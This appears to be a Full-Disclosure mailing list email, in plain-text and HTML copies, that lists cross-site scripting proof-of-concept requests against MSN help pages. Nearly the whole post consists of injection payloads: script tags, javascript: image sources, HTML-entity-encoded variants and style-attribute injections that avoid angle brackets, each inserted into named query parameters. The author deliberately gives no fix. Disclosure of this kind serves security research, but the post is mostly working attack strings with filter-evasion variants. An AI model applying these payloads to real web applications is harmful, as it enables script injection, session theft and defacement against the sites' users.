--0-821799311-1102416389=:1811 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit This is gonna be quick'n'dirty. My dinner is almost cooked... More XSS for MSN to add to the list: 1. Cross site scripting (In JavaScript context) http://help.msn.com/en_au/DirectedHelpControls.asp 1.1 GET /en_au/DirectedHelpControls.asp?DataMarket=%27%2Balert(%27Bills Momma%27)%2B%27&ITSFile=HotmailPIMv10.its51&v4Var=DH_FREE&ContactUsURL=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0 1.2 GET /en_au/DirectedHelpControls.asp?DataMarket=%22%2Balert(%27Bills Momma%27)%2B%22&ITSFile=HotmailPIMv10.its51&v4Var=DH_FREE&ContactUsURL=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0 1.3 /en_au/DirectedHelpControls.asp?DataMarket=en_au&ITSFile=%27%2Balert(%27Bills Momma%27)%2B%27&v4Var=DH_FREE&ContactUsURL=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0 1.4 GET /en_au/DirectedHelpControls.asp?DataMarket=en_au&ITSFile=%22%2Balert(%27Bills Momma%27)%2B%22&v4Var=DH_FREE&ContactUsURL=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0 1.5 GET /en_au/DirectedHelpControls.asp?DataMarket=en_au&ITSFile=HotmailPIMv10.its51&v4Var=DH_FREE&ContactUsURL=%27%2Balert(%27Bills Momma%27)%2B%27 HTTP/1.0 2 Cross site scripting (Standard variants) http://help.msn.com/EN_AU/Search/xfind_utf8.asp 2.1 GET /EN_AU/Search/xfind_utf8.asp?Search=PIM%5FInbox&S_Text=Click+a+topic%2E&Filter=&INI=HotmailPIMv10.ini&H_APP=>">&ITSFile=HotmailPIMv10.its51&BrandID=&H_VER=2.6&bITFind=True&xmltoc=&cb=http%3A%2F%2Fhelp%2Emsn%2Ecom%2F%21shared%2Fmsnlogo%2Egif&v4=DH_FREE&v3=&alttoc=MSN_HOTMAIL_PIMv10_ALTTOC.htm&market=en_au&bDH=False&RCQ=&bIS=False&ContactUs=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0 2.2 GET /EN_AU/Search/xfind_utf8.asp?Search=PIM%5FInbox&S_Text=Click+a+topic%2E&Filter=&INI=HotmailPIMv10.ini&H_APP=>%22%27>&ITSFile=HotmailPIMv10.its51&BrandID=&H_VER=2.6&bITFind=True&xmltoc=&cb=http%3A%2F%2Fhelp%2Emsn%2Ecom%2F%21shared%2Fmsnlogo%2Egif&v4=DH_FREE&v3=&alttoc=MSN_HOTMAIL_PIMv10_ALTTOC.htm&market=en_au&bDH=False&RCQ=&bIS=False&ContactUs=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0 2.3 GET /EN_AU/Search/xfind_utf8.asp?search=Default+AppScan&INI=HotmailPIMv10.ini&H_APP=>">&ITSFile=HotmailPIMv10.its51&Filter=&BrandID=&H_VER=2.6&bITFind=True&XMLTOC=&v4=DH_FREE&v3=&bDH=False&bIS=False&cb=http%3A%2F%2Fhelp.msn.com%2F%21shared%2Fmsnlogo.gif&alttoc=MSN_HOTMAIL_PIMv10_ALTTOC.htm&RCQ=&ContactUs=http%3A%2F%2Fsupport.msn.com%2Fcontactus.aspx%3Fproductkey%3Dhotmail HTTP/1.0 2.4 GET /EN_AU/Search/xfind_utf8.asp?search=Default+AppScan&INI=HotmailPIMv10.ini&H_APP=>%22%27>&ITSFile=HotmailPIMv10.its51&Filter=&BrandID=&H_VER=2.6&bITFind=True&XMLTOC=&v4=DH_FREE&v3=&bDH=False&bIS=False&cb=http%3A%2F%2Fhelp.msn.com%2F%21shared%2Fmsnlogo.gif&alttoc=MSN_HOTMAIL_PIMv10_ALTTOC.htm&RCQ=&ContactUs=http%3A%2F%2Fsupport.msn.com%2Fcontactus.aspx%3Fproductkey%3Dhotmail HTTP/1.0 3 Cross site scripting (Standard variants) http://help.msn.com/en_au/DirectedHelpControls.asp 3.1 GET /en_au/DirectedHelpControls.asp?DataMarket=>">&ITSFile=HotmailPIMv10.its51&v4Var=DH_FREE&ContactUsURL=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0 3.2 GET /en_au/DirectedHelpControls.asp?DataMarket=>%22%27>&ITSFile=HotmailPIMv10.its51&v4Var=DH_FREE&ContactUsURL=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0 4 Cross site scripting using HTML entities http://help.msn.com/EN_AU/Search/xfind_utf8.asp 4.1 GET /EN_AU/Search/xfind_utf8.asp?Search=PIM%5FInbox&S_Text=Click+a+topic%2E&Filter=&INI=HotmailPIMv10.ini&H_APP=>"'>&ITSFile=HotmailPIMv10.its51&BrandID=&H_VER=2.6&bITFind=True&xmltoc=&cb=http%3A%2F%2Fhelp%2Emsn%2Ecom%2F%21shared%2Fmsnlogo%2Egif&v4=DH_FREE&v3=&alttoc=MSN_HOTMAIL_PIMv10_ALTTOC.htm&market=en_au&bDH=False&RCQ=&bIS=False&ContactUs=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0 4.2 GET /EN_AU/Search/xfind_utf8.asp?search=Default+AppScan&INI=HotmailPIMv10.ini&H_APP=>"'>&ITSFile=HotmailPIMv10.its51&Filter=&BrandID=&H_VER=2.6&bITFind=True&XMLTOC=&v4=DH_FREE&v3=&bDH=False&bIS=False&cb=http%3A%2F%2Fhelp.msn.com%2F%21shared%2Fmsnlogo.gif&alttoc=MSN_HOTMAIL_PIMv10_ALTTOC.htm&RCQ=&ContactUs=http%3A%2F%2Fsupport.msn.com%2Fcontactus.aspx%3Fproductkey%3Dhotmail HTTP/1.0 5 Cross site scripting using HTML entities http://help.msn.com/en_au/DirectedHelpControls.asp 5.1 GET /en_au/DirectedHelpControls.asp?DataMarket=>"'>&ITSFile=HotmailPIMv10.its51&v4Var=DH_FREE&ContactUsURL=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0 6 Cross site scripting without using '<' and '>' symbols http://help.msn.com/EN_AU/Search/xfind_utf8.asp 6.1 GET /EN_AU/Search/xfind_utf8.asp?Search=PIM%5FInbox&S_Text=Click+a+topic%2E&Filter=&INI=HotmailPIMv10.ini&H_APP=%22%20style%3D%22background:url(javascript:alert(%27Bills%20Momma%27))%22%20OA%3D%22&ITSFile=HotmailPIMv10.its51&BrandID=&H_VER=2.6&bITFind=True&xmltoc=&cb=http%3A%2F%2Fhelp%2Emsn%2Ecom%2F%21shared%2Fmsnlogo%2Egif&v4=DH_FREE&v3=&alttoc=MSN_HOTMAIL_PIMv10_ALTTOC.htm&market=en_au&bDH=False&RCQ=&bIS=False&ContactUs=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0 6.2 GET /EN_AU/Search/xfind_utf8.asp?search=Default+AppScan&INI=HotmailPIMv10.ini&H_APP=%22%20style%3D%22background:url(javascript:alert(%27Bills%20Momma%27))%22%20OA%3D%22&ITSFile=HotmailPIMv10.its51&Filter=&BrandID=&H_VER=2.6&bITFind=True&XMLTOC=&v4=DH_FREE&v3=&bDH=False&bIS=False&cb=http%3A%2F%2Fhelp.msn.com%2F%21shared%2Fmsnlogo.gif&alttoc=MSN_HOTMAIL_PIMv10_ALTTOC.htm&RCQ=&ContactUs=http%3A%2F%2Fsupport.msn.com%2Fcontactus.aspx%3Fproductkey%3Dhotmail HTTP/1.0 7 Cross site scripting without using '<' and '>' symbols http://help.msn.com/en_au/directedhelp.asp 7.1 GET /en_au/directedhelp.asp?TMT='+sTMT+'&DataMarket=%22%20style%3D%22background:url(javascript:alert(%27Bills%20Momma%27))%22%20OA%3D%22&ITSFile=HotmailPIMv10.its51&v4Var=DH_FREE&ContactUsURL=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0 7.2 GET /en_au/directedhelp.asp?TMT='+sTMT+'&DataMarket=en_au&ITSFile=%22%20style%3D%22background:url(javascript:alert(%Bills%20Momma%27))%22%20OA%3D%22&v4Var=DH_FREE&ContactUsURL=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0 7.3 GET /en_au/directedhelp.asp?TMT='+sTMT+'&DataMarket=en_au&ITSFile=HotmailPIMv10.its51&v4Var=%22%20style%3D%22background:url(javascript:alert(%27Bills%20Momma%27))%22%20OA%3D%22&ContactUsURL=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0 7.4 GET /en_au/directedhelp.asp?TMT='+sTMT+'&DataMarket=en_au&ITSFile=HotmailPIMv10.its51&v4Var=DH_FREE&ContactUsURL=%22%20style%3D%22background:url(javascript:alert(%27Bills%20Momma%27))%22%20OA%3D%22 HTTP/1.0 I won't say how to fix. The last time I ran XSS by a website (Kevin Mitnicks), some nematode <">http://nematode.unl.edu/wormgen.htm> refuted my mitigating fix. Bearing in mind the triviality of XSS I really shouldn't have bothered; but I did. --------------------------------- Moving house? Beach bar in Thailand? New Wardrobe? Win £10k with Yahoo! Mail to make your dream a reality. --------------------------------- Win a castle for NYE with your mates and Yahoo! Messenger --0-821799311-1102416389=:1811 Content-Type: text/html; charset=iso-8859-1 Content-Transfer-Encoding: 8bit
This is gonna be quick'n'dirty.  My dinner is almost cooked...
 
More XSS for MSN to add to the list:
 
1. Cross site scripting (In JavaScript context)
 
 
1.1 GET /en_au/DirectedHelpControls.asp?DataMarket=%27%2Balert(%27Bills Momma%27)%2B%27&ITSFile=HotmailPIMv10.its51&v4Var=DH_FREE&ContactUsURL=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0
 
1.2 GET /en_au/DirectedHelpControls.asp?DataMarket=%22%2Balert(%27Bills Momma%27)%2B%22&ITSFile=HotmailPIMv10.its51&v4Var=DH_FREE&ContactUsURL=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0
 
1.3 /en_au/DirectedHelpControls.asp?DataMarket=en_au&ITSFile=%27%2Balert(%27Bills Momma%27)%2B%27&v4Var=DH_FREE&ContactUsURL=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0
 
1.4 GET /en_au/DirectedHelpControls.asp?DataMarket=en_au&ITSFile=%22%2Balert(%27Bills Momma%27)%2B%22&v4Var=DH_FREE&ContactUsURL=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0
 
1.5 GET /en_au/DirectedHelpControls.asp?DataMarket=en_au&ITSFile=HotmailPIMv10.its51&v4Var=DH_FREE&ContactUsURL=%27%2Balert(%27Bills Momma%27)%2B%27 HTTP/1.0
 
2 Cross site scripting (Standard variants)
 
 
2.1 GET /EN_AU/Search/xfind_utf8.asp?Search=PIM%5FInbox&S_Text=Click+a+topic%2E&Filter=&INI=HotmailPIMv10.ini&H_APP=>"><script>alert("Bills Momma")</script>&ITSFile=HotmailPIMv10.its51&BrandID=&H_VER=2.6&bITFind=True&xmltoc=&cb=http%3A%2F%2Fhelp%2Emsn%2Ecom%2F%21shared%2Fmsnlogo%2Egif&v4=DH_FREE&v3=&alttoc=MSN_HOTMAIL_PIMv10_ALTTOC.htm&market=en_au&bDH=False&RCQ=&bIS=False&ContactUs=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0
 
2.2 GET /EN_AU/Search/xfind_utf8.asp?Search=PIM%5FInbox&S_Text=Click+a+topic%2E&Filter=&INI=HotmailPIMv10.ini&H_APP=>%22%27><img%20src%3d%22javascript:alert(%27Bills Momma%27)%22>&ITSFile=HotmailPIMv10.its51&BrandID=&H_VER=2.6&bITFind=True&xmltoc=&cb=http%3A%2F%2Fhelp%2Emsn%2Ecom%2F%21shared%2Fmsnlogo%2Egif&v4=DH_FREE&v3=&alttoc=MSN_HOTMAIL_PIMv10_ALTTOC.htm&market=en_au&bDH=False&RCQ=&bIS=False&ContactUs=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0
 
2.3 GET /EN_AU/Search/xfind_utf8.asp?search=Default+AppScan&INI=HotmailPIMv10.ini&H_APP=>"><script>alert("Bills Momma")</script>&ITSFile=HotmailPIMv10.its51&Filter=&BrandID=&H_VER=2.6&bITFind=True&XMLTOC=&v4=DH_FREE&v3=&bDH=False&bIS=False&cb=http%3A%2F%2Fhelp.msn.com%2F%21shared%2Fmsnlogo.gif&alttoc=MSN_HOTMAIL_PIMv10_ALTTOC.htm&RCQ=&ContactUs=http%3A%2F%2Fsupport.msn.com%2Fcontactus.aspx%3Fproductkey%3Dhotmail HTTP/1.0
 
2.4 GET /EN_AU/Search/xfind_utf8.asp?search=Default+AppScan&INI=HotmailPIMv10.ini&H_APP=>%22%27><img%20src%3d%22javascript:alert(%27Appscan%20-%20CSS%20attack%20may%20be%20used%27)%22>&ITSFile=HotmailPIMv10.its51&Filter=&BrandID=&H_VER=2.6&bITFind=True&XMLTOC=&v4=DH_FREE&v3=&bDH=False&bIS=False&cb=http%3A%2F%2Fhelp.msn.com%2F%21shared%2Fmsnlogo.gif&alttoc=MSN_HOTMAIL_PIMv10_ALTTOC.htm&RCQ=&ContactUs=http%3A%2F%2Fsupport.msn.com%2Fcontactus.aspx%3Fproductkey%3Dhotmail HTTP/1.0
 
3 Cross site scripting (Standard variants)
 
 
3.1 GET /en_au/DirectedHelpControls.asp?DataMarket=>"><script>alert("Bills Momma")</script>&ITSFile=HotmailPIMv10.its51&v4Var=DH_FREE&ContactUsURL=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0
 
3.2 GET /en_au/DirectedHelpControls.asp?DataMarket=>%22%27><img%20src%3d%22javascript:alert(%27Bills Momma%27)%22>&ITSFile=HotmailPIMv10.its51&v4Var=DH_FREE&ContactUsURL=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0
 
4 Cross site scripting using HTML entities
 
 
4.1 GET /EN_AU/Search/xfind_utf8.asp?Search=PIM%5FInbox&S_Text=Click+a+topic%2E&Filter=&INI=HotmailPIMv10.ini&H_APP=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;Bills%26%23x20;Momma%26quot;)>&ITSFile=HotmailPIMv10.its51&BrandID=&H_VER=2.6&bITFind=True&xmltoc=&cb=http%3A%2F%2Fhelp%2Emsn%2Ecom%2F%21shared%2Fmsnlogo%2Egif&v4=DH_FREE&v3=&alttoc=MSN_HOTMAIL_PIMv10_ALTTOC.htm&market=en_au&bDH=False&RCQ=&bIS=False&ContactUs=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0
 
4.2 GET /EN_AU/Search/xfind_utf8.asp?search=Default+AppScan&INI=HotmailPIMv10.ini&H_APP=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;Bills%26%23x20;Momma%26quot;)>&ITSFile=HotmailPIMv10.its51&Filter=&BrandID=&H_VER=2.6&bITFind=True&XMLTOC=&v4=DH_FREE&v3=&bDH=False&bIS=False&cb=http%3A%2F%2Fhelp.msn.com%2F%21shared%2Fmsnlogo.gif&alttoc=MSN_HOTMAIL_PIMv10_ALTTOC.htm&RCQ=&ContactUs=http%3A%2F%2Fsupport.msn.com%2Fcontactus.aspx%3Fproductkey%3Dhotmail HTTP/1.0
 
5 Cross site scripting using HTML entities
 
 
5.1 GET /en_au/DirectedHelpControls.asp?DataMarket=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;Bills%26%23x20;Momma%26quot;)>&ITSFile=HotmailPIMv10.its51&v4Var=DH_FREE&ContactUsURL=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0
 
6 Cross site scripting without using '<' and '>' symbols
 
 
6.1 GET /EN_AU/Search/xfind_utf8.asp?Search=PIM%5FInbox&S_Text=Click+a+topic%2E&Filter=&INI=HotmailPIMv10.ini&H_APP=%22%20style%3D%22background:url(javascript:alert(%27Bills%20Momma%27))%22%20OA%3D%22&ITSFile=HotmailPIMv10.its51&BrandID=&H_VER=2.6&bITFind=True&xmltoc=&cb=http%3A%2F%2Fhelp%2Emsn%2Ecom%2F%21shared%2Fmsnlogo%2Egif&v4=DH_FREE&v3=&alttoc=MSN_HOTMAIL_PIMv10_ALTTOC.htm&market=en_au&bDH=False&RCQ=&bIS=False&ContactUs=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0
 
6.2 GET /EN_AU/Search/xfind_utf8.asp?search=Default+AppScan&INI=HotmailPIMv10.ini&H_APP=%22%20style%3D%22background:url(javascript:alert(%27Bills%20Momma%27))%22%20OA%3D%22&ITSFile=HotmailPIMv10.its51&Filter=&BrandID=&H_VER=2.6&bITFind=True&XMLTOC=&v4=DH_FREE&v3=&bDH=False&bIS=False&cb=http%3A%2F%2Fhelp.msn.com%2F%21shared%2Fmsnlogo.gif&alttoc=MSN_HOTMAIL_PIMv10_ALTTOC.htm&RCQ=&ContactUs=http%3A%2F%2Fsupport.msn.com%2Fcontactus.aspx%3Fproductkey%3Dhotmail HTTP/1.0
 
7 Cross site scripting without using '<' and '>' symbols
 
 
7.1 GET /en_au/directedhelp.asp?TMT='+sTMT+'&DataMarket=%22%20style%3D%22background:url(javascript:alert(%27Bills%20Momma%27))%22%20OA%3D%22&ITSFile=HotmailPIMv10.its51&v4Var=DH_FREE&ContactUsURL=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0
 
7.2 GET /en_au/directedhelp.asp?TMT='+sTMT+'&DataMarket=en_au&ITSFile=%22%20style%3D%22background:url(javascript:alert(%Bills%20Momma%27))%22%20OA%3D%22&v4Var=DH_FREE&ContactUsURL=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0
 
7.3 GET /en_au/directedhelp.asp?TMT='+sTMT+'&DataMarket=en_au&ITSFile=HotmailPIMv10.its51&v4Var=%22%20style%3D%22background:url(javascript:alert(%27Bills%20Momma%27))%22%20OA%3D%22&ContactUsURL=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0
 
7.4 GET /en_au/directedhelp.asp?TMT='+sTMT+'&DataMarket=en_au&ITSFile=HotmailPIMv10.its51&v4Var=DH_FREE&ContactUsURL=%22%20style%3D%22background:url(javascript:alert(%27Bills%20Momma%27))%22%20OA%3D%22 HTTP/1.0
 
I won't say how to fix.  The last time I ran XSS by a website (Kevin Mitnicks), some nematode <http://nematode.unl.edu/wormgen.htm> refuted my mitigating fix.  Bearing in mind the triviality of XSS I really shouldn't have bothered; but I did.
 
<!--# Greets:
 Hulk Hogan, Bills Momma, the homeless guy I pass on my way into the office (who incidentally, will code for food), my keypad, and all the lads on the contract where I am currently -->
 
 
 

Moving house? Beach bar in Thailand? New Wardrobe? Win £10k with Yahoo! Mail to make your dream a reality.

Win a castle for NYE with your mates and Yahoo! Messenger --0-821799311-1102416389=:1811-- _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html